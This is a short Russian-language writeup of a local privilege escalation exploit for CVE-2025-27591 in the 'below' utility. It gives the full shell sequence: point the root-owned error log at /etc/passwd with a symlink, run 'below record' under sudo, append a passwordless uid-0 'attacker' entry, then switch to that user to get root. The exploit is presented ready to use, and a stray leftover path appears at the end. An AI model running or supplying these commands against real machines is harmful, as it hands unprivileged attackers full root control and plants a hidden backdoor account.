
Эксплойт локального повышения привилегий для CVE-2025-27591, использующий небезопасную обработку символических ссылок в журналировании указанной утилиты для перезаписи произвольных файлов от имени root.
CVE-2025-27591 — это локальная уязвимость повышения привилегий в утилите below (версии до исправленного релиза), вызванная небезопасной обработкой символических ссылок в механизме ведения журналов. Злоумышленники с локальным доступом могут использовать эту уязвимость для перезаписи произвольных файлов от имени пользователя root, что приводит к полному повышению привилегий.
Утилита below записывает журналы в /var/log/below/ без надлежащей проверки символических ссылок. Заранее создав символическую ссылку, указывающую на чувствительный файл (например, /etc/passwd), злоумышленник может внедрить произвольное содержимое с повышенными привилегиями, когда уязвимый процесс запускается через sudo.
# Проверка наличия каталога журналов
test -d /var/log/below && ls -ld /var/log/below
# Удаление существующего файла журнала и создание вредоносной символической ссылки
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# Подготовка вредоносной записи passwd
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# Запуск уязвимого поведения через sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# Переключение на нового пользователя с привилегиями root
su attacker
Успешная эксплуатация предоставляет привилегии root локальному непривилегированному злоумышленнику, что позволяет полностью скомпрометировать систему.
/var/log/below/.